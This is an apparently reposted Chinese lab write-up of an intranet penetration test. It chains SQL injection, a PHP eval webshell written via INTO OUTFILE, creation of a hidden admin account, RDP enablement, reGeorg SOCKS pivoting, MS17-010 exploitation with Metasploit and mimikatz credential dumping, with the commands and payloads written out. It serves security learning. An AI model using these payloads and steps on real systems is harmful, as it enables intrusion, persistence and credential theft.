通过渗透网站拿到webshell,然后通过webshell拿到网站主机系统权限。
发现受害主机有两张网卡,另一张网卡下有两台存活的内网主机,然后我们就尝试渗透存活的内网主机看能不能拿到系统权限,最后发现两台内网主机都开启了445端口,然后搜索了一下445端口漏洞发现有个最新的m17_010可能可以利用,结果真的通过ms17_010成功获得了内网主机的权限。
浏览网站通过手工测试发现http://jy.test.com/hr/hr.php?hrid=15处有注入点
尝试利用sqlmap工具跑一下这个注入点,看能不能注出有用的信息
发现跑出来的网站后台密码是用md5加密的,所以利用md5解密一下,发现只有两个权限较低的密码可以解密,而权限较高的admin账号解不开。不过问题不大,先用登录后台(后台登录界面可以用御剑跑出来)看一下
利用御剑跑出的后台目录里有个phpinfo页面,说不定可以得到一些有用的信息
发现网站后台数据维护处可以执行sql语句,通过phpinfo页面知道了网站绝对路径,可以尝试在此处写入php一句话木马
select "<?php eval($_POST[123456]);?>" into outfile "/UPUPW_AP5.2/vhosts/jy.test.com/321.php"
添加用户:net user ddd 123456 /add
添加用户到管理员组:net localgroup Administrators ddd /add
然后开启3389端口就可以通过3389端口远程控制目标机了
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
用netstat -an命令查看发现成功开启3389端口
用arp -a命令发现目标机有两块网卡,有一块网卡是内网ip,我们开始尝试渗透内网
因为我们已经成功getshell了ip为192.168.31.196的主机,而238段的内网ip是它的另一块网卡下的主机,所以可以利用已经getshell的这台主机作为代理去渗透238段的主机
利用蚁剑在该网站根目录上传一个reGeorgSocksProxy的php脚本文件
设置kali的proxychains代理地址和端口
命令:vi /etc/proxychains.conf
python reGeorgSocksProxy.py -p 9050 -l 0.0.0.0 -u http://192.168.31.196/tunnel.php
本地所有工具都可通过目标服务器进一步攻击所有工具使用命令前加 proxychains,这样kali的所有工具就如同全部在内网那台getshell的服务器上
用nmap扫描内网的两个ip开放的端口发现都有445端口
(两个ip都开放了445端口,这里以192.168.238.130这台主机为例)
用msfconsole搜索发现445端口有一个ms17_010的漏洞,可以尝试反弹shell
use exploit/windows/smb/ms17_010_psexec
成功反弹到shell,然后就可以查看目标机的一些信息了
run getgui -u ding(用户名) -p 123456(密码)
load mimikatz #启动mimikatz
获取到明文管理员账号密码后就可以开启远程桌面用管理员账号密码进行登录系统了
作者:weixin_44991517,转载于:https:
推荐阅读![一次内网渗透测试实验过程]( "一次内网渗透测试实验过程")
觉得不错点个“赞”、“在看”,支持下小编![一次内网渗透测试实验过程]( "一次内网渗透测试实验过程")
本文始发于微信公众号(乌雲安全):一次内网渗透测试实验过程
评论